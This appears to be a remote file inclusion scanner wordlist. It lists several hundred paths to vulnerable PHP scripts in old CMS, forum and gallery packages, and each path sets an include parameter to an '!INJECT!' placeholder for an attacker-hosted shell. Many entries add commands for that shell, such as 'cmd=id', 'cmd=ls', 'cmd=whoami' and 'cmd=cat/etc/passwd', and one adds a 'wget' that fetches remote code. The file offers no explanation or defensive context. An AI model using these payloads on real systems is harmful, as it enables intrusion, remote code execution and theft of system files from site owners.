/components/com_hashcash/server.php?mosConfig_absolute_path=!INJECT!?
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=!INJECT!
/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=!INJECT!
/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=!INJECT!
/components/com_joomlaboard/file_upload.php?sbp=!INJECT!?
/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=!INJECT!?
/components/com_lm/archive.php?mosConfig_absolute_path=!INJECT!?
/components/com_mambowiki/MamboLogin.php?IP=!INJECT!?
/components/com_minibb.php?absolute_path=!INJECT!
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=!INJECT!
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=!INJECT!
/components/com_mospray/scripts/admin.php?basedir=!INJECT!?&cmd=id
/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=!INJECT!
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=!INJECT!
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=!INJECT!?
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=!INJECT!
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=!INJECT!
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=!INJECT!?
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=!INJECT!
/components/com_smf/smf.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=!INJECT!
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=!INJECT!
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=!INJECT!
/components/core/connect.php?language_path=!INJECT!
/components/minibb/bb_plugins.php?absolute_path=!INJECT!?
/components/minibb/index.php?absolute_path=!INJECT!?
/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
/compteur/mapage.php?chemin=!INJECT!
/conf.php?securelib=!INJECT!
/conf.php?securelib=!INJECT!?
/config.inc.php3?rel_path=!INJECT!
/config.inc.php?_path=!INJECT!
/config.inc.php?path_escape=!INJECT!
/config.inc.php?path_escape=!INJECT!%00
/config.php?full_path=!INJECT!?
/config.php?full_path_to_db=!INJECT!
/config.php?fullpath=!INJECT!
/config.php?incpath=!INJECT!
/config.php?path_to_root=!INJECT!
/config.php?rel_path=!INJECT!?
/config.php?returnpath=!INJECT!
/config.php?sql_language=!INJECT!?
/config.php?xcart_dir=!INJECT!?
/config/config_admin.php?INC=!INJECT!?
/config/config_main.php?INC=!INJECT!?
/config/config_member.php?INC=!INJECT!?
/config/dbutil.bck.php?confdir=!INJECT!
/config/mysql_config.php?INC=!INJECT!?
/config/sender.php?ROOT_PATH=!INJECT!?
/configuration.php?absolute_path=!INJECT!?
/confirmUnsubscription.php?output=!INJECT!
/connect.php?path=!INJECT!
/connexion.php?DOCUMENT_ROOT=!INJECT!?
/contact.php?blog_theme=!INJECT!
/contacts.php?cal_dir=!INJECT!
/contenido/external/frontend/news.php?cfg[path][includes]=!INJECT!
/content.php?content=!INJECT!
/content/admin.php?pwfile=!INJECT!
/content/content.php?fileloc=!INJECT!?
/content/delete.php?pwfile=!INJECT!
/content/modify.php?pwfile=!INJECT!
/content/modify_go.php?pwfile=!INJECT!
/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=!INJECT!
/contrib/mx_glance_sdesc.php?mx_root_path=!INJECT!
/contrib/phpBB2/modules.php?phpbb_root_path=!INJECT!?
/controllers/MySQLController.php?baseDir=!INJECT!
/controllers/SQLController.php?baseDir=!INJECT!
/controllers/SetupController.php?baseDir=!INJECT!
/controllers/VideoController.php?baseDir=!INJECT!
/controllers/ViewController.php?baseDir=!INJECT!
/convert-date.php?cal_dir=!INJECT!
/convert/mvcw.php?step=1&vwar_root=!INJECT!
/convert/mvcw.php?vwar_root=!INJECT!
/core/admin/admin.php?p=admin&absoluteurl!INJECT!
/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl!INJECT!
/core/admin/categories_add.php?absoluteurl!INJECT!
/core/admin/categories_remove.php?absoluteurl!INJECT!
/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl!INJECT!
/core/admin/editdel.php?p=admin&absoluteurl!INJECT!
/core/admin/ftpfeature.php?p=admin&absoluteurl!INJECT!
/core/admin/login.php?absoluteurl!INJECT!
/core/admin/pgRSSnews.php?absoluteurl!INJECT!
/core/admin/showcat.php?absoluteurl!INJECT!
/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl!INJECT!
/core/archive_cat.php?absoluteurl!INJECT!
/core/archive_nocat.php?absoluteurl!INJECT!
/core/aural.php?site_absolute_path=!INJECT!
/core/aural.php?site_absolute_path=!INJECT!?&cmd=dir
/core/editor.php?editor_insert_bottom=!INJECT!
/core/includes.php?CMS_ROOT=!INJECT!?
/core/recent_list.php?absoluteurl!INJECT!
/corpo.php?pagina=!INJECT!
/cp2.php?securelib=!INJECT!?
/cpe/index.php?repertoire_config=!INJECT!
/crea.php?plancia=!INJECT!
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=!INJECT!?
/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=!INJECT!?
/creat_news_all.php?language=!INJECT!
/create_file.php?target=!INJECT!?
/cron.php?ROOT_PATH=!INJECT!
/cron.php?include_path=!INJECT!?
/crontab/run_billing.php?config[include_dir]=!INJECT!?
/cross.php?url=!INJECT!
/custom_vars.php?sys[path_addon]=!INJECT!
/customer/product.php?xcart_dir=!INJECT!
/cwb/comanda.php?INCLUDE_PATH=!INJECT!?
/datei.php?config[root_ordner]=!INJECT!?&cmd=id
/db/PollDB.php?CONFIG_DATAREADERWRITER=!INJECT!?
/db/mysql/db.inc.php?SPL_CFG[dirroot]=!INJECT!?
/dbcommon/include.php?_APP_RELATIVE_PATH=!INJECT!
/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=!INJECT!
/debugger.php?config_atkroot=!INJECT!
/decoder/gallery.php?ccms_library_path=!INJECT!
/decoder/markdown.php?ccms_library_path=!INJECT!
/defaults_setup.php?ROOT_PATH=!INJECT!?cmd=ls
/defines.php?WEBCHATPATH=!INJECT!?
/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=!INJECT!&
/depouilg.php3?NomVote=!INJECT!?
/development.php?root_prefix=!INJECT!?
/dfcode.php?DFORUM_PATH=!INJECT!?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=!INJECT!?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=!INJECT!?
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!?
/dialog.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/dialogs/a.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/collorpicker.php?spaw_dir=!INJECT!&cmd=id
/dialogs/img.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/img_library.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/table.php?spaw_dir=!INJECT!?&cmd=id
/dialogs/td.php?spaw_dir=!INJECT!?&cmd=id
/digitaleye_Path/module.php?menu=!INJECT!?
/dir/prepend.php?_PX_config[manager_path]=!INJECT!
/dir_thatware/config.php?root_path=!INJECT!'
/direct.php?rf=!INJECT!
/direction/index.php?repertoire_config=!INJECT!
/directory/index.php?path=!INJECT!
/display.php?pag=!INJECT!
/display.php?path=!INJECT!
/displayCategory.php?basepath=!INJECT!
/dix.php3?url_phpartenaire=!INJECT!
/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
/doc/admin/index.php?ptinclude=!INJECT!
/doceboCore/lib/lib.php?GLOBALS[where_framework]=!INJECT!
/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=!INJECT!
/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=!INJECT!
/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=!INJECT!
/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=!INJECT!
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=!INJECT!
/docs/front-end-demo/cart2.php?workdir=!INJECT!?
/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=!INJECT!?&cmd=wget%20!INJECT!
/dosearch.php?RESPATH=!INJECT!
/download.php?root_prefix=!INJECT!?
/download_engine_V1.4.3/addmember.php?eng_dir=!INJECT!
/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=!INJECT!
/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=!INJECT!
/downstat1.8/chart.php?art=!INJECT!?
/dp_logs.php?HomeDir=!INJECT!
/eXPerience2/modules.php?file=!INJECT!
/ea-gBook/index_inc.php?inc_ordner=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/edit.php?javascript_path=!INJECT!?
/editor.php?newsfile=!INJECT!
/editprofile.php?pathtohomedir=!INJECT!?
/editsite.php?returnpath=!INJECT!
/editx/add_address.php?include_dir=!INJECT!
/elseif/contenus.php?contenus=!INJECT!
/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=!INJECT!
/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=!INJECT!
/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=!INJECT!
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=!INJECT!
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign!INJECT!
/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=!INJECT!
/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=!INJECT!
/email_subscribe.php?root_prefix=!INJECT!?
/embed/day.php?path=!INJECT!
/enc/content.php?Home_Path=!INJECT!?
/engine/Ajax/editnews.php?root_dir=!INJECT!
/engine/api/api.class.php?dle_config_api=!INJECT!?
/engine/engine.inc.php?absolute_path=!INJECT!
/engine/init.php?root_dir=!INJECT!
/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=!INJECT!?
/enth3/show_joined.php?path=!INJECT!
/environment.php?DIR_PREFIX=!INJECT!
/epal/index.php?view=!INJECT!?
/errors.php?error=!INJECT!
/errors/configmode.php?GALLERY_BASEDIR=!INJECT!
/errors/needinit.php?GALLERY_BASEDIR=!INJECT!
/errors/reconfigure.php?GALLERY_BASEDIR=!INJECT!
/errors/unconfigured.php?GALLERY_BASEDIR=!INJECT!
/es_custom_menu.php?files_dir=!INJECT!
/es_desp.php?files_dir=!INJECT!
/es_offer.php?files_dir=!INJECT!
/eshow.php?Config_rootdir=!INJECT!
/esupport/admin/autoclose.php?subd=!INJECT!?
/eva/index.php3?aide=!INJECT!?
/eva/index.php3?perso=!INJECT!
/eva/index.php?eva[caminho]=!INJECT!
/event.php?myevent_path=!INJECT!
/event_cal/module/embed/day.php?path=!INJECT!
/eventcal2.php.php?path_simpnews=!INJECT!
/eventscroller.php?path_simpnews=!INJECT!
/example-view/templates/article.php?globals[content_dir]=!INJECT!?
/example-view/templates/dates_list.php?globals[content_dir]=!INJECT!?
/example-view/templates/root.php?globals[content_dir]=!INJECT!?
/example.php?site=!INJECT!
/example/gamedemo/inc.functions.php?projectPath=!INJECT!?
/examplefile.php?bibtexrootrel=!INJECT!?
/examples/patExampleGen/bbcodeSource.php?example=!INJECT!
/exception/include.php?_APP_RELATIVE_PATH=!INJECT!
/extauth/drivers/ldap.inc.php?clarolineRepositorySys=!INJECT!
/extras/mt.php?web_root=!INJECT!
/extras/poll/poll.php?file_newsportal=!INJECT!
/ezusermanager_pwd_forgott.php?ezUserManager_Path=!INJECT!
/faq.php?module_root_path=!INJECT!
/faq.php?phpbb_root_path=!INJECT!
/fckeditor/editor/dialog/fck_link.php?dirroot=!INJECT!
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=!INJECT!
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=!INJECT!?&cmd=id
/fcring.php?s_fuss=!INJECT!
/feed.php?config[root_ordner]=!INJECT!?&cmd=id
/feed/index2.php?m=!INJECT!
/files/amazon-bestsellers.php?CarpPath=!INJECT!
/files/carprss.php?CarpPath=!INJECT!
/files/compose-attach.php3?BSX_LIBDIR=!INJECT!
/files/compose-menu.php3?BSX_LIBDIR=!INJECT!
/files/compose-new.php3?BSX_LIBDIR=!INJECT!
/files/compose-send.php3?BSX_LIBDIR=!INJECT!
/files/folder-create.php3?BSX_LIBDIR=!INJECT!
/files/folder-delete.php3?BSX_LIBDIR=!INJECT!
/files/folder-empty.php3?BSX_LIBDIR=!INJECT!
/files/folder-rename.php3?BSX_LIBDIR=!INJECT!
/files/folders.php3?BSX_LIBDIR=!INJECT!
/files/login.php3?err=hack&BSX_HTXDIR=!INJECT!
/files/mainfile.php?page[path]=!INJECT!?&cmd=ls
/files/mbox-list.php3?BSX_LIBDIR=!INJECT!
/files/message-delete.php3?BSX_LIBDIR=!INJECT!
/files/message-forward.php3?BSX_LIBDIR=!INJECT!
/files/message-header.php3?BSX_LIBDIR=!INJECT!
/files/message-print.php3?BSX_LIBDIR=!INJECT!
/files/message-read.php3?BSX_LIBDIR=!INJECT!
/files/message-reply.php3?BSX_LIBDIR=!INJECT!
/files/message-replyall.php3?BSX_LIBDIR=!INJECT!
/files/message-search.php3?BSX_LIBDIR=!INJECT!
/findix/index.php?page=!INJECT!?&cmd=id
/fishcart_v3/fc_functions/fc_example.php?docroot=!INJECT!
/flushcmd/Include/editor/rich_files/class.rich.php?class_path=!INJECT!?
/fonctions/template.php?repphp=!INJECT!?
/fonctions_racine.php?chemin_lib=!INJECT!
/footer.inc.php?settings[footer]=!INJECT!
/footer.inc.php?tfooter=!INJECT!?
/footer.php?footer_file=!INJECT!
/footer.php?op[footer_body]=!INJECT!?
/form.php?path=!INJECT!?&cmd=pwd
/forum.php?cfg_file=1&fpath=!INJECT!?
/forum/forum.php?view=!INJECT!
/forum/forum82lib.php3?repertorylevel=!INJECT!?
/forum/gesfil.php?repertorylevel=!INJECT!?
/forum/lostpassword.php?repertorylevel=!INJECT!?
/forum/mail.php?repertorylevel=!INJECT!?
/forum/member.php?repertorylevel=!INJECT!?
/forum/message.php?repertorylevel=!INJECT!?
/forum/search.php?repertorylevel=!INJECT!?
/forum/track.php?path=!INJECT!
/frame.php?framefile=!INJECT!
/ftp.php?path_local=!INJECT!
/function.inc.php?path=!INJECT!
/function.php?adminfolder=!INJECT!
/function.php?gbpfad=!INJECT!
/functions.php?include_path=!INJECT!
/functions.php?pmp_rel_path=!INJECT!
/functions.php?s[phppath]=!INJECT!
/functions.php?set_path=!INJECT!?
/functions/form.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/general.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/groups.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/js.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/prepend_adm.php?SETS[path][physical]=!INJECT!
/functions/prepend_adm.php?SETS[path][physical]=!INJECT!?
/functions/sections.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions/users.func.php?GLOBALS[PTH][classes]=!INJECT!?
/functions_mod_user.php?phpbb_root_path=!INJECT!?&cmd=ls
/fusebox5.php?FUSEBOX_APPLICATION_PATH=!INJECT!
/galerie.php?config[root_ordner]=!INJECT!?cmd=id
/gallery/captionator.php?GALLERY_BASEDIR=!INJECT!
/gallery/lib/content.php?include=!INJECT!?cmd=ls
/gallery/theme/include_mode/template.php?galleryfilesdir=!INJECT!
/gallerypath/index.php?includepath=!INJECT!
/games.php?id=!INJECT!
/games.php?scoreid=!INJECT!
/gbook/includes/header.php?abspath=!INJECT!?
/gemini/page/forums/bottom.php?lang=!INJECT!?
/gen_m3u.php?phpbb_root_path=!INJECT!
/genepi.php?topdir=!INJECT!
/generate.php?ht_pfad=!INJECT!?
/gepi/gestion/savebackup.php?filename=!INJECT!&cmd=cat/etc/passwd
/gestArt/aide.php3?aide=!INJECT!?
/get_session_vars.php?path_to_smf=!INJECT!
/getpage.php?page=online&doc_path=!INJECT!
/global.php?abs_path=!INJECT!?
/gorum/dbproperty.php?appDirName=!INJECT!
/gpb/include/db.mysql.inc.php?root_path=!INJECT!?
/gpb/include/gpb.inc.php?root_path=!INJECT!?
/graph.php?DOCUMENT_ROOT=!INJECT!?
/gruppen.php?config[root_ordner]=!INJECT!?&cmd=id
/handlers/email/mod.listmail.php?_PM_[path][handle]=!INJECT!
/handlers/page/show.php?sous_rep=!INJECT!
/head.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/header.inc.php?CssFile=!INJECT!
/header.php?path=!INJECT!
/header.php?wwwRoot=!INJECT!
/help.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/help/index.php?show=!INJECT!
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
/helperfunction.php?includedir=!INJECT!
/hioxBannerRotate.php?hm=!INJECT!
/hioxRandomAd.php?hm=!INJECT!
/hioxstats.php?hm=!INJECT!
/hioxupdate.php?hm=!INJECT!
/home.php?a=!INJECT!
/home.php?page=!INJECT!
/home.php?pagina=!INJECT!
/home/www/images/doc/index2.php?type=!INJECT!
/home1.php?ln=!INJECT!
/home2.php?ln=!INJECT!
/hsList.php?subdir=!INJECT!?&cmd=ls
/htdocs/gmapfactory/params.php?gszAppPath=!INJECT!
/html/admin/modules/plugin_admin.php?_settings[pluginpath]=!INJECT!
/hu/modules/reg-new/modstart.php?mod_dir=!INJECT!?
/i_head.php?home=!INJECT!
/i_nav.php?home=!INJECT!
/iframe.php?file=!INJECT!
/image.php?url=!INJECT!???
/impex/ImpExData.php?systempath=!INJECT!
/import.php?bibtexrootrel=!INJECT!?
/importinfo.php?bibtexrootrel=!INJECT!?
/in.php?returnpath=!INJECT!
/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=!INJECT!
/inc/config.inc.php?x[1]=!INJECT!
/inc/design.inc.php?dir[data]=!INJECT!
/inc/download_center_lite.inc.php?script_root=!INJECT!
/inc/formmail.inc.php?script_root=!INJECT!
/inc/gabarits.php?cfg_racine=!INJECT!
/inc/header.inc.php?ficStyle=!INJECT!
/inc/ifunctions.php?GLOBALS[phpQRootDir]=!INJECT!
/inc/inc.php?cfg_racine=!INJECT!?
/inc/indexhead.php?fileloc=!INJECT!?
/inc/irayofuncs.php?irayodirhack=!INJECT!?
/inc/libs/Smarty_Compiler.class.php?plugin_file=!INJECT!?
/inc/libs/core/core.display_debug_console.php?plugin_file=!INJECT!?
/inc/libs/core/core.load_plugins.php?plugin_file=!INJECT!?
/inc/libs/core/core.load_resource_plugin.php?plugin_file=!INJECT!?
/inc/libs/core/core.process_cached_inserts.php?plugin_file=!INJECT!?
/inc/libs/core/core.process_compiled_include.php?plugin_file=!INJECT!?
/inc/libs/core/core.read_cache_file.php?plugin_file=!INJECT!?
/inc/linkbar.php?cfile=!INJECT!?
/inc/login.php?pathCGX=!INJECT!
/inc/logingecon.php?pathCGX=!INJECT!
/inc/ltdialogo.php?pathCGX=!INJECT!
/inc/mtdialogo.php?pathCGX=!INJECT!
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=!INJECT!?
/inc/prepend.inc.php?path=!INJECT!?
/inc/service.alert.inc.php?SPL_CFG[dirroot]=!INJECT!?
/inc/settings.php?inc_dir=!INJECT!
/inc/settings.ses.php?SPL_CFG[dirroot]=!INJECT!?
/inc/shows.inc.php?cutepath=!INJECT!?
/inc/sige_init.php?SYS_PATH=!INJECT!?
/inc_group.php?include_path=!INJECT!?
/inc_manager.php?include_path=!INJECT!?
/inc_newgroup.php.php?include_path=!INJECT!?
/inc_smb_conf.php?include_path=!INJECT!?
/inc_user.php?include_path=!INJECT!?
/include.php?_APP_RELATIVE_PATH=!INJECT!
/include.php?gorumDir=!INJECT!
/include.php?myng_root=!INJECT!
/include.php?path=psp/user.php&site=!INJECT!
/include.php?path[docroot]=!INJECT!
/include.php?sunPath=!INJECT!
/include/Beautifier/Core.php?BEAUT_PATH=!INJECT!
/include/HTML_oben.php?include_path=!INJECT!
/include/HTML_oben.php?include_path=!INJECT!?
/include/SQuery/gameSpy2.php?libpath=!INJECT!
/include/bbs.lib.inc.php?site_path=!INJECT!
/include/class_yapbbcooker.php?cfgIncludeDirectory=!INJECT!
/include/classes.php?INCLUDE_DIR=!INJECT!?
/include/client.php?INCLUDE_DIR=!INJECT!?
/include/cls_headline_prod.php?INCLUDE_PATH=!INJECT!
/include/cls_listorders.php?INCLUDE_PATH=!INJECT!
/include/cls_viewpastorders.php?INCLUDE_PATH=!INJECT!
/include/common.php?XOOPS_ROOT_PATH=!INJECT!
/include/common_functions.php?baros_path=!INJECT!?
/include/config.inc.php?racine=!INJECT!
/include/copyright.php?tsep_config[absPath]=!INJECT!?cmd=ls
/include/customize.php?l=!INJECT!&text=Hello%20World
/include/default_header.php?script_path=!INJECT!
/include/define.php?INC_DIR=!INJECT!?
/include/disp_form.php3?cfg_include_dir=!INJECT!?
/include/disp_smileys.php3?cfg_include_dir=!INJECT!?
/include/dom.php?path=!INJECT!
/include/dtd.php?path=!INJECT!
/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=!INJECT!?
/include/engine/content/elements/menu.php?CONFIG[AdminPath]=!INJECT!
/include/forms.php?INCLUDE_DIR=!INJECT!?
/include/global.php?pfad=!INJECT!
/include/header.php?cs_base_path=!INJECT!?
/include/html/nettools.popup.php?DIR=!INJECT!
/include/inc.foot.php?root=!INJECT!
/include/inc_ext/spaw/dialogs/table.php?spaw_root=!INJECT!
/include/inc_freigabe.php?include_path=!INJECT!?
/include/inc_freigabe1.php?include_path=!INJECT!?
/include/inc_freigabe3.php?include_path=!INJECT!?
/include/include_stream.inc.php?include_path=!INJECT!
/include/include_top.php?g_include=!INJECT!
/include/includes.php?include_path=!INJECT!
/include/index.php3?cfg_include_dir=!INJECT!?
/include/init.inc.php?G_PATH=!INJECT!
/include/issue_edit.php?INCLUDE_DIR=!INJECT!?
/include/lib/lib_slots.php?main_path=!INJECT!
/include/lib/lib_stats.php?main_path=!INJECT!?
/include/lib/lib_users.php?main_path=!INJECT!?
/include/little_news.php3?cfg_include_dir=!INJECT!?
/include/livre_include.php?no_connect=lol&chem_absolu=!INJECT!?
/include/loading.php?path_include=!INJECT!
/include/mail.inc.php?root=!INJECT!
/include/menu_builder.php?config[page_dir]=!INJECT!?
/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=!INJECT!
/include/monitoring/engine/MakeXML.php?fileOreonConf=!INJECT!?
/include/parser.php?path=!INJECT!
/include/pear/IT.php?basepath=!INJECT!?
/include/pear/ITX.php?basepath=!INJECT!?
/include/pear/IT_Error.php?basepath=!INJECT!?
/include/phpxd/phpXD.php?appconf[rootpath]=!INJECT!?&cmd=id
/include/prodler.class.php?sPath=!INJECT!???
/include/scripts/export_batch.inc.php?DIR=!INJECT!
/include/scripts/run_auto_suspend.cron.php?DIR=!INJECT!
/include/scripts/send_email_cache.php?DIR=!INJECT!
/include/startup.inc.php?root_path=!INJECT!?
/include/themes/themefunc.php?myNewsConf[path][sys][index]=!INJECT!?
/include/timesheet.php?config[include_dir]=!INJECT!
/include/urights.php?CRM_inc=!INJECT!
/includes/admin_board2.php?phpbb_root_path=!INJECT!?ls
/includes/admin_logger.php?phpbb_root_path=!INJECT!?ls
/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=!INJECT!?
/includes/ajax_listado.php?urlModulo=!INJECT!
/includes/archive/archive_topic.php?phpbb_root_path=!INJECT!?
/includes/bbcb_mg.php?phpbb_root_path=!INJECT!?
/includes/begin.inc.php?PagePrefix=!INJECT!
/includes/blogger.php?path_prefix=!INJECT!
/includes/class/class_tpl.php?cache_file=!INJECT!?
/includes/class_template.php?quezza_root_path=!INJECT!
/includes/classes/pctemplate.php?pcConfig[smartyPath]=!INJECT!?cmd
/includes/common.inc.php?CONFIG[BASE_PATH]=!INJECT!
/includes/common.php?module_root_path=!INJECT!?
/includes/common.php?root=!INJECT!?
/includes/common.php?root_path=!INJECT!?
/includes/config.inc.php?racineTBS=!INJECT!
/includes/config/master.inc.php?fm_data[root]=!INJECT!?
/includes/connection.inc.php?PagePrefix=!INJECT!
/includes/dbal.php?eqdkp_root_path=!INJECT!
/includes/events.inc.php?PagePrefix=!INJECT!
/includes/footer.html.inc.php?tc_config[app_root]=!INJECT!?
/includes/footer.inc.php?PagePrefix=!INJECT!
/includes/footer.php?PHPGREETZ_INCLUDE_DIR=!INJECT!
/includes/functions.inc.php?sitepath=!INJECT!?
/includes/functions.php?location=!INJECT!
/includes/functions.php?phpbb_root_path=!INJECT!
/includes/functions.php?phpbb_root_path=!INJECT!?
/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
/includes/functions/html_generate.php?path_prefix=!INJECT!
/includes/functions/master.inc.php?fm_data[root]=!INJECT!?
/includes/functions/validations.php?path_prefix=!INJECT!
/includes/functions_admin.php?phpbb_root_path=!INJECT!?
/includes/functions_install.php?vwar_root=!INJECT!
/includes/functions_kb.php?phpbb_root_path=!INJECT!?
/includes/functions_mod_user.php?phpbb_root_path=!INJECT!?
/includes/functions_portal.php?phpbb_root_path=!INJECT!?
/includes/functions_user_viewed_posts.php?phpbb_root_path=!INJECT!?
/includes/global.php?nbs=!INJECT!?
/includes/header.inc.php?PagePrefix=!INJECT!
/includes/header.inc.php?dateiPfad=!INJECT!
/includes/include_once.php?include_file=!INJECT!
/includes/init.php?includepath=!INJECT!?
/includes/iplogger.php?phpbb_root_path=!INJECT!?ls
/includes/kb_constants.php?module_root_path=!INJECT!
/includes/lang/language.php?path_to_root=!INJECT!
/includes/lib-account.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-group.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-log.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/lib-themes.inc.php?CONF_CONFIG_PATH=!INJECT!?
/includes/logger_engine.php?phpbb_root_path=!INJECT!
/includes/menuleft.inc.php?PagePrefix=!INJECT!
/includes/mkb.php?phpbb_root_path=!INJECT!?ls
/includes/morcegoCMS/adodb/adodb.inc.php?path=!INJECT!
/includes/morcegoCMS/morcegoCMS.php?fichero=!INJECT!
/includes/mx_common.php?module_root_path=!INJECT!?
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=!INJECT!
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=!INJECT!
/includes/pafiledb_constants.php?module_root_path=!INJECT!
/includes/pages.inc.php?PagePrefix=!INJECT!
/includes/phpdig/includes/config.php?relative_script_path=!INJECT!
/includes/profilcp_constants.php?module_root_path=!INJECT!?
/includes/settings.inc.php?approot=!INJECT!
/includes/template.php?myevent_path=!INJECT!
/includes/themen_portal_mitte.php?phpbb_root_path=!INJECT!
/includes/tumbnail.php?config[root_ordner]=!INJECT!?
/includes/usercp_register.php?phpbb_root_path=!INJECT!?
/includes/usercp_viewprofile.php?phpbb_root_path=!INJECT!?
/includes/xhtml.php?d_root=!INJECT!?
/index.php3?Application_Root=!INJECT!
/index.php?1=lol&PAGES[lol]=!INJECT!
/index.php?AML_opensite=!INJECT!
/index.php?AMV_openconfig=1&AMV_serverpath=!INJECT!
/index.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/index.php?ConfigDir=!INJECT!
/index.php?DIR_PLUGINS=!INJECT!
/index.php?G_JGALL[inc_path]=!INJECT!%00
/index.php?HomeDir=!INJECT!
/index.php?Lang=AR&Page=!INJECT!
/index.php?Madoa=!INJECT!?
/index.php?RP_PATH=!INJECT!
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
/index.php?abg_path=!INJECT!?
/index.php?abs_path=!INJECT!?
/index.php?adduser=true&lang=!INJECT!
/index.php?adodb=!INJECT!
/index.php?ads_file=!INJECT!
/index.php?arquivo=!INJECT!
/index.php?back=!INJECT!
/index.php?base==!INJECT!
/index.php?basePath=!INJECT!
/index.php?bibtexrootrel=!INJECT!?
/index.php?blog_dc_path=!INJECT!
/index.php?blog_theme=!INJECT!
/index.php?body=!INJECT!
/index.php?class_path=!INJECT!?
/index.php?classified_path=!INJECT!?
